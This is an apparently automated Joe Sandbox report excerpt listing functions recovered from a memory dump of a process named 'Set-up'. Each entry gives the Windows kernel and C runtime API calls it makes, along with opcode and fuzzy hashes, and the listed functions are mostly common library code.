                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _lock$CriticalEnterHandleIncrementInterlockedModuleSection_unlock
                                                                                              • String ID: KERNEL32.DLL
                                                                                              • API String ID: 2973837600-2576044830
                                                                                              • Opcode ID: a2333e82f890a2209dcd0939ce883e5cdd0b26ce11e86b0d669418b630bf2bcb
                                                                                              • Instruction ID: 8882b848e82a322dcf04eb7a0067a65e7c88eab16ea55cf413676a8243307b92
                                                                                              • Opcode Fuzzy Hash: a2333e82f890a2209dcd0939ce883e5cdd0b26ce11e86b0d669418b630bf2bcb
                                                                                              • Instruction Fuzzy Hash: 36016D71405B80DEE7209F75C84674DBBF0BF413A5F10494ED4DA972A0EBB8AE40CB65
                                                                                              Function 6BB97100 Relevance: 7.6, APIs: 5, Instructions: 100COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • QueryDepthSList.KERNEL32(?,?,?,?,?,?,6BB969F3,?,?), ref: 6BB9717E
                                                                                              • InterlockedPushEntrySList.KERNEL32(?,?,?,?,?,?,6BB969F3,?,?), ref: 6BB97193
                                                                                              • QueryDepthSList.KERNEL32(?,?,?,?,?,6BB969F3,?,?), ref: 6BB9719A
                                                                                              • InterlockedFlushSList.KERNEL32(?,?,?,?,?,6BB969F3,?,?), ref: 6BB971C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: List$DepthInterlockedQuery$EntryFlushPush
                                                                                              • String ID:
                                                                                              • API String ID: 4063097673-0
                                                                                              • Opcode ID: 08966bef877b80835c40795176e7cbc2dc94fe655475285ddf866755327398f7
                                                                                              • Instruction ID: 71b82e41ebbfa1989b689c74a8c7b4105807be8ef507f5ee4a7552439c7e2bdc
                                                                                              • Opcode Fuzzy Hash: 08966bef877b80835c40795176e7cbc2dc94fe655475285ddf866755327398f7
                                                                                              • Instruction Fuzzy Hash: 41319C76500565AFCB00EF29D9809AA73E4FF4B32472545AAE816DB700DB78FD41CBE0
                                                                                              Function 6BBA3E78 Relevance: 7.6, APIs: 5, Instructions: 100COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • QueryDepthSList.KERNEL32(80000000,-00000001,00000000,?,?,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000), ref: 6BBA3EF6
                                                                                              • InterlockedPushEntrySList.KERNEL32(80000008,-000000C8,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB9682D), ref: 6BBA3F0D
                                                                                              • QueryDepthSList.KERNEL32(80000008,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB9682D,?), ref: 6BBA3F14
                                                                                              • InterlockedFlushSList.KERNEL32(80000008,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB9682D,?), ref: 6BBA3F43
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: List$DepthInterlockedQuery$EntryFlushPush
                                                                                              • String ID:
                                                                                              • API String ID: 4063097673-0
                                                                                              • Opcode ID: 3dfd938ca33544d5ad0d84400069d617c20b6c59ee2ccf57456c1c8491e8d60d
                                                                                              • Instruction ID: cffe00ffe99ed43c9d215e424ea9566452e35efa2a40d967fad815aaded54f01
                                                                                              • Opcode Fuzzy Hash: 3dfd938ca33544d5ad0d84400069d617c20b6c59ee2ccf57456c1c8491e8d60d
                                                                                              • Instruction Fuzzy Hash: 6131D276A14565AFCB10CF28C9809AAB3F8FF4A320B158559E816CB700D739F941CFE0
                                                                                              Function 6BB6C656 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _lock.MSVCR100(00000001,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB6C66B
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • _malloc_crt.MSVCR100(00000038,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB88F66
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB88F8E
                                                                                              • free.MSVCR100(01332288), ref: 6BB88FA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$CountEnterInitializeSpin_lock_malloc_crtfree
                                                                                              • String ID:
                                                                                              • API String ID: 954917037-0
                                                                                              • Opcode ID: 00816b152f2fe2ce1cb4892808e7e7ae67be07e2ff9453a0423a20b246c5b217
                                                                                              • Instruction ID: eea778f9fff3ff5b3f5c1fd952beb637306933fd50074ea85b2071bc2d5545af
                                                                                              • Opcode Fuzzy Hash: 00816b152f2fe2ce1cb4892808e7e7ae67be07e2ff9453a0423a20b246c5b217
                                                                                              • Instruction Fuzzy Hash: F931CD71A042819FDB10CFA9C4C1A1EBBF0FF2A360B51415EE1559B290EB79ED419F44
                                                                                              Function 6BB975A4 Relevance: 7.6, APIs: 5, Instructions: 92COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR100(00000000,00000001,00000001,00000000,ECA782CA,?,6BB95C86), ref: 6BB975FB
                                                                                              • ?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB97622
                                                                                              • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(6BB95CC6), ref: 6BB97663
                                                                                              • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100(?,?,?,?,?,?,?,?,6BB95CC6), ref: 6BB97692
                                                                                              • ?Block@Context@Concurrency@@SAXXZ.MSVCR100(?,?,?,?,?,?,?,?,6BB95CC6), ref: 6BB976B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Spin$??0scoped_lock@critical_section@?unlock@critical_section@?wait_for_multiple@event@A@@details@Block@Context@Once@?$_V12@V12@@Wait@$0
                                                                                              • String ID:
                                                                                              • API String ID: 358966004-0
                                                                                              • Opcode ID: d9a8345214f68d461e2cac7a027da7e30bbe1983dc3fd9018b47dbba03319a8e
                                                                                              • Instruction ID: 00446ce2422dd4b14b35216f8c8e65a6fc6428f4f10a2137c5f0bbfa17b436df
                                                                                              • Opcode Fuzzy Hash: d9a8345214f68d461e2cac7a027da7e30bbe1983dc3fd9018b47dbba03319a8e
                                                                                              • Instruction Fuzzy Hash: E5318B715483819FD710EF29E481B4AB7E4FB87764F100A3EF4A586290E7B9D548CBA2
                                                                                              Function 6BB6F457 Relevance: 7.6, APIs: 5, Instructions: 90COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+
                                                                                              • String ID:
                                                                                              • API String ID: 2943138195-0
                                                                                              • Opcode ID: 4fbd2542969918843cf57cb0e4617998dcd867c2c17a199d56718f2e71db114b
                                                                                              • Instruction ID: 84a6afd5746d3580f43cc95753dde0d4d49e71c808c91a8ab1595b5a05e6a3fa
                                                                                              • Opcode Fuzzy Hash: 4fbd2542969918843cf57cb0e4617998dcd867c2c17a199d56718f2e71db114b
                                                                                              • Instruction Fuzzy Hash: FC31E172A402889FC710CF6CD8819EABBF9EF49744B40446EE5D6CB340E778AD41CB50
                                                                                              Function 6BB97785 Relevance: 7.6, APIs: 5, Instructions: 85COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BB9778C
                                                                                              • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB9779F
                                                                                                • Part of subcall function 6BB9B030: __EH_prolog3.LIBCMT ref: 6BB9B037
                                                                                              • malloc.MSVCR100(00000001,?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB977E8
                                                                                              • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100(?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB9783A
                                                                                              • _freea_s.MSVCR100(00000000,?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB97853
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$??0scoped_lock@critical_section@?unlock@critical_section@H_prolog3H_prolog3_V12@@_freea_smalloc
                                                                                              • String ID:
                                                                                              • API String ID: 911861471-0
                                                                                              • Opcode ID: 38bd23a89b7adf31a18b87cc886eb2a2c501600a58b251147a20aaca010b1755
                                                                                              • Instruction ID: eaa3f9677139a12f0b163d2ac9ee2dae868ae30d69a1290699c58957265b95f7
                                                                                              • Opcode Fuzzy Hash: 38bd23a89b7adf31a18b87cc886eb2a2c501600a58b251147a20aaca010b1755
                                                                                              • Instruction Fuzzy Hash: 5B21A071E002918FDB05EFAAE8D1A5EB7F5FF46750B1040B9D955DB250DBBC9801CB90
                                                                                              Function 6BBABFDC Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,6BC06CD0,00000104,?,?,?,?,?,?,6BB87432), ref: 6BBABFFA
                                                                                              • _parse_cmdline.LIBCMT ref: 6BBAC025
                                                                                              • _malloc_crt.MSVCR100(?,?,?,?,?,?,?,6BB87432), ref: 6BBAC048
                                                                                              • _parse_cmdline.LIBCMT ref: 6BBAC061
                                                                                              • __cwild.LIBCMT ref: 6BBAC077
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _parse_cmdline$FileModuleName__cwild_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 953782237-0
                                                                                              • Opcode ID: 832e4a1475bfe490aea00c44c259271035c65253daa804e90637ea2ec35b43a3
                                                                                              • Instruction ID: a77c1dd8eaadabd43ce408ad0fe9c9f3ffcacc60f1205542b7d0f4de168b2d8f
                                                                                              • Opcode Fuzzy Hash: 832e4a1475bfe490aea00c44c259271035c65253daa804e90637ea2ec35b43a3
                                                                                              • Instruction Fuzzy Hash: 0111D672A08254AFDB24CB78CC40A9E7BF8DB4A774F11066AE611E71C0EB75DA0087A4
                                                                                              Function 6BBA2FB8 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA2FBF
                                                                                              • EnterCriticalSection.KERNEL32(?,00000028,6BB9F124,00000000,?,00000000,?,6BB9CACE,?,00000000,00000000,?,?), ref: 6BBA2FCB
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?), ref: 6BBA2FF0
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BBA304D
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?), ref: 6BBA305B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterH_prolog3Leave
                                                                                              • String ID:
                                                                                              • API String ID: 4250467438-0
                                                                                              • Opcode ID: f73a7c96be08116baa69d3f4c8054e21a7175f5e7ec878ef0858a1b888388ef2
                                                                                              • Instruction ID: 845aa51dc135d7caf4c500fc526e22c14a4dffe80c1f5dbe72e31e8e29978e98
                                                                                              • Opcode Fuzzy Hash: f73a7c96be08116baa69d3f4c8054e21a7175f5e7ec878ef0858a1b888388ef2
                                                                                              • Instruction Fuzzy Hash: F7216071E08286AFDB38DF79C495B6EBBB5FF45340B1484A9E111EB160EB39D940CB21
                                                                                              Function 6BB775B1 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _localtime64_s.MSVCR100(?,?), ref: 6BB77600
                                                                                              • asctime_s.MSVCR100(?,00000000,?), ref: 6BB77613
                                                                                              • _errno.MSVCR100 ref: 6BB77628
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6BB89D0A
                                                                                              • _errno.MSVCR100 ref: 6BB89D16
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_localtime64_sasctime_s
                                                                                              • String ID:
                                                                                              • API String ID: 2556715357-0
                                                                                              • Opcode ID: dc1bbefaad9d6fd37e01dc0bea5bb49cb2c938f624e3e9e14c173556c444b568
                                                                                              • Instruction ID: c7dd86dd7d1b4debdb53cc69cc3bfc62e1ca59ded31ee9ce25798395acb40522
                                                                                              • Opcode Fuzzy Hash: dc1bbefaad9d6fd37e01dc0bea5bb49cb2c938f624e3e9e14c173556c444b568
                                                                                              • Instruction Fuzzy Hash: 72115C31A002999BDF25EF3ADC41BDE73A5DF4A710F50407AE8109B140E77CC900CB94
                                                                                              Function 6BB6FAE4 Relevance: 7.6, APIs: 5, Instructions: 62COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcsnicoll_l.MSVCR100(?,?,?,00000000), ref: 6BB6FB02
                                                                                              • _errno.MSVCR100 ref: 6BB8C7BD
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C7C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
                                                                                              • String ID:
                                                                                              • API String ID: 1358483507-0
                                                                                              • Opcode ID: f5980a937237d3a9837fa8ac43a88e4e21217a1dcfeed7bedbc2d3ff54a3f29b
                                                                                              • Instruction ID: e12e846b483ed322a32c31381b1ce47551f53bf669ed932cb026dd2722ebb07e
                                                                                              • Opcode Fuzzy Hash: f5980a937237d3a9837fa8ac43a88e4e21217a1dcfeed7bedbc2d3ff54a3f29b
                                                                                              • Instruction Fuzzy Hash: 381125B55801E5EBDF200E65E8903BD32E5EB117A1F54879AF8648A284DB3DC840CBA1
                                                                                              Function 6BB70DAC Relevance: 7.6, APIs: 5, Instructions: 62COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _fileno.MSVCR100(?,?,?,6BB71072,?,6BB710A8,0000000C,6BB710DE,Function_000113F7,?,?,00000000,?), ref: 6BB70DB6
                                                                                              • _isatty.MSVCR100(00000000,?,?,?,6BB71072,?,6BB710A8,0000000C,6BB710DE,Function_000113F7,?,?,00000000,?), ref: 6BB70DBC
                                                                                              • __p__iob.MSVCR100(?,?,6BB71072,?,6BB710A8,0000000C,6BB710DE,Function_000113F7,?,?,00000000,?), ref: 6BB88A2D
                                                                                              • _malloc_crt.MSVCR100(00001000,?,?,?,?,6BB71072,?,6BB710A8,0000000C,6BB710DE,Function_000113F7,?,?,00000000,?), ref: 6BB88A71
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __p__iob_fileno_isatty_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 301265415-0
                                                                                              • Opcode ID: b0e33a281db99699bc48fafba5dbe40ce34e3bd83499395ac8616115242dade8
                                                                                              • Instruction ID: 88f238b5d0747deb16f34b1c9235990548e3b8bc6a0acd6655729cda98857a65
                                                                                              • Opcode Fuzzy Hash: b0e33a281db99699bc48fafba5dbe40ce34e3bd83499395ac8616115242dade8
                                                                                              • Instruction Fuzzy Hash: 931173728087829FD3609F79DC91647B7F8EB553A4B10892ED5A6C3640F779E4808B90
                                                                                              Function 6BB6C830 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(6BB6C8B0,0000000C), ref: 6BB6C8D6
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB6C8B0,0000000C), ref: 6BB894A7
                                                                                                • Part of subcall function 6BB6C656: _lock.MSVCR100(00000001,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB6C66B
                                                                                              • _errno.MSVCR100(6BB6C8B0,0000000C), ref: 6BB894B3
                                                                                              • _errno.MSVCR100(6BB6C8B0,0000000C), ref: 6BB894C0
                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT(6BC03610,?,000000FE,6BB6C8B0,0000000C), ref: 6BB894D6
                                                                                                • Part of subcall function 6BB6C737: __wsopen_s.LIBCMT(?,?,00000000,?,00000180,00000000,?,?), ref: 6BB6C801
                                                                                                • Part of subcall function 6BB6C8CC: _unlock_file.MSVCR100(?,6BB6C8A6), ref: 6BB6C8CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$CallFilterFunc@8__wsopen_s_invalid_parameter_noinfo_lock_unlock_file
                                                                                              • String ID:
                                                                                              • API String ID: 773299370-0
                                                                                              • Opcode ID: 1c9e8976ff0fb63ec232ebdad60f27d332e7afd8d846cb672ae27d2975574560
                                                                                              • Instruction ID: 25f5a64f84459698e1a9f859402a9a92981eb1358dac8c4887faccc4548afe70
                                                                                              • Opcode Fuzzy Hash: 1c9e8976ff0fb63ec232ebdad60f27d332e7afd8d846cb672ae27d2975574560
                                                                                              • Instruction Fuzzy Hash: 5E11E570940685EECF60AF79CC8267E37A5AF45394F698E41D428DB281FB7D8D808F61
                                                                                              Function 6BB77385 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _calloc_crt.MSVCR100(00000001,00000004,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000,01331910), ref: 6BB773A8
                                                                                              • _wcsdup.MSVCR100(00000000,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000,01331910), ref: 6BB773C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _calloc_crt_wcsdup
                                                                                              • String ID:
                                                                                              • API String ID: 1800982338-0
                                                                                              • Opcode ID: 5b08de2ed221164f32a8d5774b068affb9a3b21a8141c1f95a01a0211a412f0c
                                                                                              • Instruction ID: bfe5d42e77c8a05c28bd23b3e51701c05ba8a27fcf264a83abd2a71f06eca167
                                                                                              • Opcode Fuzzy Hash: 5b08de2ed221164f32a8d5774b068affb9a3b21a8141c1f95a01a0211a412f0c
                                                                                              • Instruction Fuzzy Hash: CB01F772A04251DBE720AB79DC01B5A77E8DB42778F260179E961D72C0EBBDD801CB60
                                                                                              Function 6BB6BD9A Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6BB907A6
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 6BB907B2
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB907BA
                                                                                              • GetTickCount.KERNEL32 ref: 6BB907C2
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6BB907CE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
